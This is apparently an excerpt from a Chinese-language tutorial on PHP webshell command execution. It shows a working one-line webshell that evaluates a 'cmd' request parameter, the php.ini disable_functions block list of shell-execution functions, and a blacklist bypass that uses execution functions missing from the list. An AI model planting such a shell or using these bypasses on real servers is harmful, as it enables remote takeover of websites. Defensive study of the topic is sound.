示例代码

  1. <?php
  2. $cmd = $_GET["cmd"];
  3. echo "<pre>";
  4. eval($cmd);
  5. echo "</pre>";
  6. ?>

PHP webshell命令执行防御及绕过方法

0x00 PHP禁止webshell执行命令防御

PHP的配置文件php.ini里面有个disable_functions =
配置这个,禁止某些php函数,便可以禁止php的命令执行漏洞,例如:

disable_functions=system,passthru,shell_exec,exec,popen

0x01 PHP webshell命令执行绕过方法

1.黑名单绕过
php能够执行系统命令的函数有:

assert,system,passthru,exec,pcntl_exec,shell_exec,popen,proc_open,`(反单引号)

根据黑名单中没有的函数,即可绕过。